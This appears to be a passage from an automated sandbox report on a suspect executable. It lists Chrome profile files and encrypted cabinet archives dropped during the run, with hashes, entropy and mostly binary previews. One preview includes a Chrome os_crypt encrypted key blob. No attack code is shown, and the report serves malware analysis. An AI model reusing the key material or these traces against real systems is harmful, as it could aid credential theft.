Preview:	....TFL3........................................4.......................%.......min_runtime_version.'..........................t...h...T...8...,.............................................................t........C...C..............x...d...X...<..........................>...........1.11.0..............J..............................j.............B@z...........f.@...................yw....z.......................w...........y.......y....i.....x............yy...y...xyw.x..........y....y..........zg...zyi..i.h...y....x..........y..x.y.y...x.......x....yx...y...........xxx.i..........y....y.......xzx.yxw.w.......y..yx...z.................................w.w..x.y....x....yy...h.......y..y...y........y........h....y............y....y.......x..y....y..y..w.x..........y....yx.x.......y....y........yx..y.y..f...i.x........yy..i.y...yy...y..x....x....x..y..yz...x..z....y....h..w.w..x.x......w..wi....xw...................h.e..........xy...y..x....y.y...............x..hxyx.zY......w....y...

C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Browser

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	106
Entropy (8bit):	3.138546519832722
Encrypted:	false
SSDEEP:	3:tbloIlrJ5ldQxl7aXVdJiG6R0RlAl:tbdlrnQxZaHIGi0R6l
MD5:	DE9EF0C5BCC012A3A1131988DEE272D8
SHA1:	FA9CCBDC969AC9E1474FCE773234B28D50951CD8
SHA-256:	3615498FBEF408A96BF30E01C318DAC2D5451B054998119080E7FAAC5995F590
SHA-512:	CEA946EBEADFE6BE65E33EDFF6C68953A84EC2E2410884E12F406CAC1E6C8A0793180433A7EF7CE097B24EA78A1FDBB4E3B3D9CDF1A827AB6FF5605DA3691724
Malicious:	false
Reputation:	unknown
Preview:	C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Version

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.5654483718208256
Encrypted:	false
SSDEEP:	3:MRO6:MX
MD5:	729CC0F524BFE7B4599C6E6E5BF38507
SHA1:	1782FB371769697DF5E6A47FA12F38EB5B2A7EDE
SHA-256:	D121222427CD64AA6E9BD08EA710DDDC5BAC8A85B3D4564E428B9DD84E0880FF
SHA-512:	1BD8FC3A8CDA3105FC0AAF73CC7E14022D386F240EF28B749EBCC16588B907A166585D67CB1C866E8AE07ACFF6B44157ABD60E5F270F3B6AFFE4F9D328A09651
Malicious:	false
Reputation:	unknown
Preview:	104.0.5112.81

C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	61214
Entropy (8bit):	6.071020531075422
Encrypted:	false
SSDEEP:	1536:nD71LMtANJaRBOHK5KvtgBhqQ0HTgHImA01exhi8qjyDKly2:D711NyBTOgd0HhmAnhqj3L
MD5:	BE591546D722E679933F2373F6BB4F15
SHA1:	E16F50F2ADD2C81EEA52C20A6A8AE41A6A867FD3
SHA-256:	FB83F5C9A50EDF1D9DA9CB43EE4EB4915680808CDC80B51529E3CB5A4E89E162
SHA-512:	FEA68B1DCB15139CA8BE32E4036989E474789E8FB19A933AA412120A883B6B29C68AA8B810C94E0D0C5CCCC2C1B71CF1517338E2A8F23D03BDB4D8966F326943
Malicious:	false
Reputation:	unknown
Preview:	{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291230639910128"},"policy":{"last_statistics_update"

C:\Users\user\AppData\Local\Google\Chrome\User Data\Module Info Cache (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	109716
Entropy (8bit):	3.7471611688757824
Encrypted:	false
SSDEEP:	384:XhXqgOd2OPnihZtrvE6vtgn3VEKtsNlrGvpj36dbmHnCGCKZrkX9JkryxcMDrna1:Xw2OXy+5diSNu4e3sTnKTr+fKCHtDN
MD5:	20635342B193FEFF63D68DCB5AADB5BE
SHA1:	0B30417FC502FCA51E506D818D8976C46AB17B2E
SHA-256:	F4093456138DE83476B77FAB9F5A75E43202E74DB08EC8D26426418B6331624E
SHA-512:	E3F9967C2DFE172046F4CCC36D207676B7D333643EB6C1E9AD629112CA4B1C7D93906CCDD3513A68CDB8F803FA4D2930783DAA28EB9F6681183A548BC963CA04
Malicious:	false
Reputation:	unknown
Preview:	...................C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6......M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....e8.@...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.G.o.o.g.l.e.\.U.p.d.a.t.e.\.1...3...3.6...1.0.2.\.p.s.m.a.c.h.i.n.e._.6.4...d.l.l..p..+S.`0...c.:.\.p.r.o.g.r.a.m. .f.i.l.e.s. .(.x.8.6.).\.g.o.o.g.l.e.\.u.p.d.a.t.e.\.1...3...3.6...1.0.2.\.....p.s.m.a.c.h.i.n.e._.6.4...d.l.l.....G.o.o.g.l.e. .U.p.d.a.t.e.......G.o.o.g.l.e. .U.p.d.a.t.e.......1...3...3.6...1.0.2.....@...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.G.o.o.g.l.e.\.U.p.d.a.t.e.\.1...3...3.6...

C:\Users\user\AppData\Local\Google\Chrome\User Data\Variations

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	85
Entropy (8bit):	4.3488360343066725
Encrypted:	false
SSDEEP:	3:YQ3JYq9xSs0dMEJAELJ25AmIpozQw:YQ3Kq9X0dMgAEiLI2
MD5:	265DB1C9337422F9AF69EF2B4E1C7205
SHA1:	3E38976BB5CF035C75C9BC185F72A80E70F41C2E
SHA-256:	7CA5A3CCC077698CA62AC8157676814B3D8E93586364D0318987E37B4F8590BC
SHA-512:	3CC9B76D8D4B6EDB4C41677BE3483AC37785F3BBFEA4489F3855433EBF84EA25FC48EFEE9B74CAB268DC9CB7FB4789A81C94E75C7BF723721DE28AEF53D8B529
Malicious:	false
Reputation:	unknown
Preview:	{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":2}

C:\Users\user\AppData\Local\Google\Chrome\User Data\a72bb156-b4f6-4de5-b94b-c46827352028.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	61214
Entropy (8bit):	6.07102845207324
Encrypted:	false
SSDEEP:	1536:vj71LMtANJaRBOHK5KvtgBhqQ0HTgHImA01exhi8qjyDKly2:7711NyBTOgd0HhmAnhqj3L
MD5:	D96FF5412F997F12CFE6973A5FCE7926
SHA1:	97D61173E45CF6719B91EBB44C975DCF92400BFD
SHA-256:	8E52267DD172085E81574A428050CA06BF7D0C2D126E5F92AFF81B22F7CEB88D
SHA-512:	5480817CC751DC893B53AAE1187C2D99796FA13384111AF8854CC2260979CF31E686E0B83651CB15D59D9E26C98AE6E67413292BEB0A2DCF597F9FD3D9C25263
Malicious:	false
Reputation:	unknown
Preview:	{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291230639910128"},"policy":{"last_statistics_update"

C:\Users\user\AppData\Local\Google\Chrome\User Data\b40d4930-6314-4f87-8439-12a83279d288.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	118719
Entropy (8bit):	6.050408773689408
Encrypted:	false
SSDEEP:	3072:iatS55TnNtTFS788k8oZ0711NyBTOgd0HhmAnhqj3k:6HD3FS7V2AXNyTOpBmAh4k
MD5:	92283E614603F59A4BD5C22DE7B51AF2
SHA1:	62C8B1F7AA36CACF3BAC1A16B5492EB0C222C227
SHA-256:	EEFD21828DF931BA50E9C71BB8E4F8F1E617AF58C5A0CA27947CC41C71C72DBE
SHA-512:	A27689615A48188AAB7550B16F4E782599AF8DE2E8C7A2822E3D7F492F768F7754B61B4D6560335F11823B835BF33E710AB389F0EEDB3F941CA8AA9BF8EBDB85
Malicious:	false
Reputation:	unknown
Preview:	{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"network_time":{"network_time_mapping":{"local":1.661304209804544e+12,"network":1.661271814e+12,"ticks":151767576.0,"uncertainty":9000880.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxa

C:\Users\user\AppData\Local\Google\Chrome\User Data\b7b6f4ac-35f6-4aa4-a8f9-51529fe594d4.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	118719
Entropy (8bit):	6.0504096310454445
Encrypted:	false
SSDEEP:	3072:watS55TnNtTFS788k8oZ0711NyBTOgd0HhmAnhqj3k:UHD3FS7V2AXNyTOpBmAh4k
MD5:	CD66FBB04347CE83E5DDF8831DA9B029
SHA1:	EE405DC96E4731A5A0547E94F24993B35921004D
SHA-256:	9B0279F64EE66E53FC3832501BD7C5562DE8F9E2F6AFF446DC6F6CF5FDA2B50F
SHA-512:	998A3975D277CC951F657997124C0BF3A98C9198AA268AFA83B2AEDC5BB5FEB7873B89798DC48E0B334B8C0581BCF861039442E0B60B70CB2672070C1E88389B
Malicious:	false
Reputation:	unknown
Preview:	{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"network_time":{"network_time_mapping":{"local":1.661304209804544e+12,"network":1.661271814e+12,"ticks":151767576.0,"uncertainty":9000880.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxa

C:\Users\user\AppData\Local\Google\Chrome\User Data\d5e935df-39d5-48d2-bdf2-f0ed0c517f4c.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	modified
Size (bytes):	61214
Entropy (8bit):	6.071018505565257
Encrypted:	false
SSDEEP:	1536:4Y71LMtANJaRBOHK5KvtgBhqQ0HTgHImA01exhi8qjyDKly2:b711NyBTOgd0HhmAnhqj3L
MD5:	91771502E18F9E545FB5F65C68E28F32
SHA1:	9F4002FC78A5CB20E18478FC315019102369287C
SHA-256:	64DD954210F064F414E377C4D36A549218B2E2A0D008AA40135DF8C7825FCD65
SHA-512:	ED5F36B8F9DE7F26CEC89AB3B4301751D63F7AA65C8898B935086CA0F5E52EA7659EDFD6AC04824E6141833231B964E5F24779B702BBE067A65D9DD658FA1B0E
Malicious:	false
Reputation:	unknown
Preview:	{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291230639910128"},"policy":{"last_statistics_update"

C:\Users\user\AppData\Local\Google\Chrome\User Data\e7a516d8-0b0b-43f4-a664-a659e2ddf3e1.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	109716
Entropy (8bit):	3.7471611688757824
Encrypted:	false
SSDEEP:	384:XhXqgOd2OPnihZtrvE6vtgn3VEKtsNlrGvpj36dbmHnCGCKZrkX9JkryxcMDrna1:Xw2OXy+5diSNu4e3sTnKTr+fKCHtDN
MD5:	20635342B193FEFF63D68DCB5AADB5BE
SHA1:	0B30417FC502FCA51E506D818D8976C46AB17B2E
SHA-256:	F4093456138DE83476B77FAB9F5A75E43202E74DB08EC8D26426418B6331624E
SHA-512:	E3F9967C2DFE172046F4CCC36D207676B7D333643EB6C1E9AD629112CA4B1C7D93906CCDD3513A68CDB8F803FA4D2930783DAA28EB9F6681183A548BC963CA04
Malicious:	false
Reputation:	unknown
Preview:	...................C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6......M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....e8.@...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.G.o.o.g.l.e.\.U.p.d.a.t.e.\.1...3...3.6...1.0.2.\.p.s.m.a.c.h.i.n.e._.6.4...d.l.l..p..+S.`0...c.:.\.p.r.o.g.r.a.m. .f.i.l.e.s. .(.x.8.6.).\.g.o.o.g.l.e.\.u.p.d.a.t.e.\.1...3...3.6...1.0.2.\.....p.s.m.a.c.h.i.n.e._.6.4...d.l.l.....G.o.o.g.l.e. .U.p.d.a.t.e.......G.o.o.g.l.e. .U.p.d.a.t.e.......1...3...3.6...1.0.2.....@...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.G.o.o.g.l.e.\.U.p.d.a.t.e.\.1...3...3.6...

C:\Users\user\AppData\Local\Google\Chrome\User Data\ff6d7dfa-5aa2-4e7b-91fd-10fd90bb02e7.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	61214
Entropy (8bit):	6.0710243822240555
Encrypted:	false
SSDEEP:	1536:4e71LMtANJaRBOHK5KvtgBhqQ0HTgHImA01exhi8qjyDKly2:h711NyBTOgd0HhmAnhqj3L
MD5:	C23FA9F91E50E4F0FCEAD46BEE145F74
SHA1:	EE0218A1227FE90C35019532AC40E8ADEC1B3569
SHA-256:	EE97065D5DFD435B63543767227C309C7968316249B372EF21DDE1811765FC19
SHA-512:	282B6713F8AABB38D57831C44DA0BF5D9316BE360A185414DAB4BD96A4E7795807FC511DBD6144B170F5C457D1CF82EFF8403D65EA7D5B6831D496193007E179
Malicious:	false
Reputation:	unknown
Preview:	{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291230639910128"},"policy":{"last_statistics_update"

C:\Users\user\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	99914B932BD37A50B983C5E7C90AE93B
SHA1:	BF21A9E8FBC5A3846FB05B4FA0859E0917B2202F
SHA-256:	44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
SHA-512:	27C74670ADB75075FAD058D5CEAF7B20C4E7786C83BAE8A32F626F9782AF34C9A33C2046EF60FD2A7878D378E29FEC851806BBD9A67878F3A9F1CDA4830763FD
Malicious:	false
Reputation:	unknown
Preview:	{}

C:\Users\user\AppData\Local\Temp\$inst\2.tmp

Download File

Process:	C:\Users\user\Desktop\9n6ctoq7cn.exe
File Type:	Microsoft Cabinet archive data, 36 bytes
Category:	dropped
Size (bytes):	36
Entropy (8bit):	1.3753156176197312
Encrypted:	false
SSDEEP:	3:wDl:wDl
MD5:	8708699D2C73BED30A0A08D80F96D6D7
SHA1:	684CB9D317146553E8C5269C8AFB1539565F4F78
SHA-256:	A32E0A83001D2C5D41649063217923DAC167809CAB50EC5784078E41C9EC0F0F
SHA-512:	38ECE3E441CC5D8E97781801D5B19BDEDE6065A0A50F7F87337039EDEEB4A22AD0348E9F5B5542B26236037DD35D0563F62D7F4C4F991C51020552CFAE03B264
Malicious:	false
Reputation:	unknown
Preview:	MSCF....$.......$...................

C:\Users\user\AppData\Local\Temp\$inst\temp_0.tmp

Download File

Process:	C:\Users\user\Desktop\9n6ctoq7cn.exe
File Type:	Microsoft Cabinet archive data, 2513098 bytes, 10 files
Category:	dropped
Size (bytes):	2513098
Entropy (8bit):	7.991316607243398
Encrypted:	true
SSDEEP:	49152:uNpJc7YrEa2u2h9swu+AU3Z9CcVL2wD+aRpXPaAt1DD4VR+Wu:Yc8rHJ2jHxZYOTDrRxaAt1DEVwWu
MD5:	6755BB2E0A1EB238B1CDD7D3D9268718
SHA1:	A89B6E2FD4ECF4DCF7CB22B7227F22D64ED3152A
SHA-256:	A36D46D4C9A0713CB2CCB313BD293E85041BEF5D994CA5C10AB450550787ACFE
SHA-512:	0FD132C555A0C7EC0B602B2F82110FC278D251DE7466C5A24B9A9AC10C0E3C26EBBEDFBFB981573D55D2906B7E4BFC78E0452D04EAE840199A884919D0A6D79C
Malicious:	false
Reputation:	unknown
Preview:	MSCF.....X&.....,............................L.........U.Z .0......L.....U.> .1...... .....U.. .2..n.........U.. .3......:.....U.. .4............U.W .5..n.........U.. .6......,!....U.. .7.......,....U.@ .8..l....G....U.. .9.ce.^!..[.... .8q..@2.E#.`...o.rY.t....gW{..L8..vw...n.;.ro.....{.....{..`.V...0.#..I...&..cY.h.1J..V...FH.H#....u..2S.$.........>t.....:WI...,...[.....<j...W...."q.e..w.3..07.:....b......[.p.e....K...=I...........F........{..~.f.[...X.......,.].L0 Q.......G.\|C.......L6o....U.....X.C.$of.......l..T.?..\@..gt.!:.h....3..;....&3..e.j.^....y6.^....T.=...../.....l....p....D..t..f.l...=1...TV.p.@j.Jo'...K......."[..w.....^.?.[....[o..t........a....-~....F..C...'........g1.6h....?.....x.... ....,...(...c.O..#K..q...:H.V.(.B qj.M.\|......{.c_.{......G......g..>....X...@z.p......M.......H;.....8..8p{.{.l6.1..............,?p.`l0.....x..........~$......'p..x.W.............j.p.X.&....m.H.Aj.......P..=.=..]...\|.``..7.\.....(.....GXp...

C:\Users\user\AppData\Local\Temp\0e015237-2d24-4486-8640-8c9e7623d5ca.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	248531
Entropy (8bit):	7.963657412635355
Encrypted:	false
SSDEEP:	3072:r+nmRykNgoldZ8GjJCiUXZSk+QSVh85PxEalRVHmcld9R6yYfEp4ABUGDcaKklrv:k3oF4Z4h45P99Fld9RBQYBVcaxlnfL
MD5:	541F52E24FE1EF9F8E12377A6CCAE0C0
SHA1:	189898BB2DCAE7D5A6057BC2D98B8B450AFAEBB6
SHA-256:	81E3A4D43A73699E1B7781723F56B8717175C536685C5450122B30789464AD82
SHA-512:	D779D78A15C5EFCA51EBD6B96A7CCB6D718741BDF7D9A37F53B2EB4B98AA1A78BC4CFA57D6E763AAB97276C8F9088940AC0476690D4D46023FF4BF52F3326C88
Malicious:	false
Reputation:	unknown
Preview:	Cr24..............0.."0....H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L\|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.\|1..n.<Fb..f..Q1.....s..2..{.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-eu...b.........\..F!...b...l5....zJ.q.......L].....w[T0.6....E.....r..%Z.vFm.9..5!,.~g5...;.t...']....+A.....u....k...e..&..l.6r[yU...%..f.......N..V.....<+.....l..}.{...z...)y.n..'..).....,.b....5.08K%..O.g..D.S.F5o..<(....>....\f..X..I..2."l...w....7f\|.~.c.4.E.......0..0....H............0.......).'..b.$w\$.q&.]zF_2..;...?.U,...W..L1.2...R..#....W.....c1k.$W..$.J....+M!.Hz.n`U.I)N.\|b.l....{.K@]6.LlP/....](.A..................I...).H....IQ.y.;MG.d..ix..#f.Z$\|..\|.?...0K...t"i..s...Y..%.Ky....0...{.!+.~v.;....J.....Z....).(6..@?v.;~..2..c....[0Y0....H.=.....H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. .0...\|!..A..L.+.=...kP.!.1..

C:\Users\user\AppData\Local\Temp\1d461731-ecdd-4a50-a271-64fdb605118b.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
Category:	dropped
Size (bytes):	3112
Entropy (8bit):	7.939241749332395
Encrypted:	false
SSDEEP:	96:wKpzsMIEd544qmUtUxg2GaAve/VkCvy/JtK:xptFd5dqmUtUxrgGYnK
MD5:	8CDA3FFA8BBC32485EDC42E13716ACE6
SHA1:	422303FEA67454E1D873AF39C3D3773468AC8660
SHA-256:	818B7BC5BFA41FFCD7233D78ECDDF779B77E4868EF2B9485312001CAD6C63361
SHA-512:	B397F2A9146FCB109F37F499F828AB2C8431DFD125873D318A90DA809126F45A1012D75DC86DA506E0D09A5226AC4ECB8B768CCB47198FF29AD0AFAC8C33FB39
Malicious:	false
Reputation:	unknown
Preview:	............ko.7......J...&9....GN........Wj...^.[.kE...........N0`......."...DTkY......O...#....^..Z/.T)9-Kb...L1y......\+F..E.......D.....[&9..tM(yqu.H.u.HYd...^PM2..!...yN...>..\|{.....GG...RYs]....0....a.Z.4._.J3..hV.L.....\|..rL..9...%S.....;...$.W...5 2)....s.OH..&.......32..&....$.y.p.d...I&b..2.Q$......t..4.'X.Bm....w.95y`.._...mV.$B.......q.H......<DT.v..9...Z.^.....o.v.k.I.x.[....X.(.....kC(....!...;;.9..aC.[.R...)}.g.m......}Ds.tJ..Rr>#.N...R.1..jg.......a;....L.%Ee........;......Y`.......V....h..aK.....2z4.<j&.L(.B...j....Q.-@...L>#..........V...7........E..q@h...Rd..y..f....g.............b....E.DWw....&...~V...eh@..'..{.n.V<.1<o...Zz..*...pP.I.s.j..x..0..6...5;..Q.\)...<UL.a..T.pY....&:.h...X\....kK.B..T3O...s.X..il.6&.%..R.u9.(....'n..4.._.{..B.Cyc....W..Y.m'.w..Q`. 1......b...I.....!.o`..rc...?WZH......G......B.{7..Gw .S._wU............4...r.B.....hY...$..SH..'.......`1E.....d4_.0.....C...6..g.A...V.9.o)Q..Y!.-0y...1..H.

C:\Users\user\AppData\Local\Temp\4584_1172060276\model-info.pb

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	200
Entropy (8bit):	5.437791346330686
Encrypted:	false
